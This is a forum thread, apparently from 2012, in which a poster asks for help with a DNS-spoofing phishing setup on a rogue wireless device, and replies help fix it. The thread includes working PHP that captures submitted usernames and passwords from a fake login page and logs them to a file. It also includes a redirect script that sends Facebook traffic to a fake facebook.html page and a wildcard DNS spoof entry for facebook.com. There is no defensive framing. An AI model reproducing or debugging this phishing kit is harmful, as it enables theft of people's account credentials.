First Time Poster, Phishing Question

[SinisterRaccoon]

kudos on an excellent toy btw! been toying with the apple for awhile off n on. just got back on it again.

trouble i am having is with the dns spoof. so far, i have got the 3g stick to work, connection is great. everything comes up as expected. however, if i turn the dns spoof on, every site just takes me to the error.php page. yesterday it worked fine with a facebook phish site, then today, after no changes, it is going buggy on me. ill paste what i have and maybe the wiser can see what i dont:)

error.php

<?php

$ref = $_SERVER['HTTP_REFERER'];

$today = date("F j, Y, g:i a");

if (isset($_POST['name']) && !empty($_POST['name'])) {

$nam = stripslashes($_POST['name']);

$pas = stripslashes($_POST['pass']);

$nam = htmlspecialchars($nam, ENT_QUOTES);

$pas = htmlspecialchars($pas, ENT_QUOTES);

$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;

$filed = @fopen("bitches.txt", "a+");

@fwrite($filed, "$content\n");

@fclose($filed);

}

?>

<html><body>

<h1>503 Service Unavailable</h1>

</body></html>

index.php

<html>

<head>

<meta http-equiv="REFRESH" content="0;url=redirect.php">

</head>

<body>

</body>

</html>

redirect.php

<?php

$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook")) { header('Location: facebook.html'); }

require('error.php');

?>

[SinisterRaccoon]

so just tried it again for giggles. it works. sometimes. most of the time it will send my www.whatever.com to www.whatever.com/redirect

"whatever" being, well...whatever i put in there. google does come to google sometimes, but then again, it also takes me to google.com/redirect which then leads to the error.php page or just a flickering refresh....plz helllp lol

[sober]

google.com has twelve IP numbers (74.125.228.34, 74.125.228.35, 74.125.228.39, 74.125.228.33, 74.125.228.36, 2607:f8b0:4004:801::1003, 74.125.228.38, 74.125.228.41, 74.125.228.32, 74.125.228.40, 74.125.228.37, 74.125.228.46). All twelve of them are on the same IP network.

http://www.robtex.co...om.html#records

redirecting all ips to your file should take care of any issues with it occasionally loading the legitimate page.

edit: and seeing as your dns spoofing that was useless advice

Edited August 10, 2012 by sober

[Neworld]

easier way is to put this in

172.16.42.1 *facebook.com
[/CODE]

If your still getting redirected to PHP.... replace your redirect.php with this to see if it works.

[CODE]
<?php
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
if (strpos($ref, "facebook")) { header('Location: facebook.html'); }

require('error.php');

?>
[/CODE]

Report back please :D

Edited August 10, 2012 by Neworld

[SinisterRaccoon]

thx for the help, just off work and gave it a try with *facebook.com, it appears to be working on my phone browser, ill try more indepth with the laptop tomorrow. just for knowledge sake, why do you think that the spoof worked at times but then not others? as i understand it, the wildcard sends the request off to redirect.php where it is then either looking to see if "facebook" is part of the request, and if so it will send the request off to the fake facebook.html, else it does nothing and functions as normal.

ill try the second fix tomorrow as well to see what it does. off to dream of pineapples now :D

[Neworld]

thx for the help, just off work and gave it a try with *facebook.com, it appears to be working on my phone browser, ill try more indepth with the laptop tomorrow. just for knowledge sake, why do you think that the spoof worked at times but then not others? as i understand it, the wildcard sends the request off to redirect.php where it is then either looking to see if "facebook" is part of the request, and if so it will send the request off to the fake facebook.html, else it does nothing and functions as normal.

ill try the second fix tomorrow as well to see what it does. off to dream of pineapples now :D

Glad I can help :D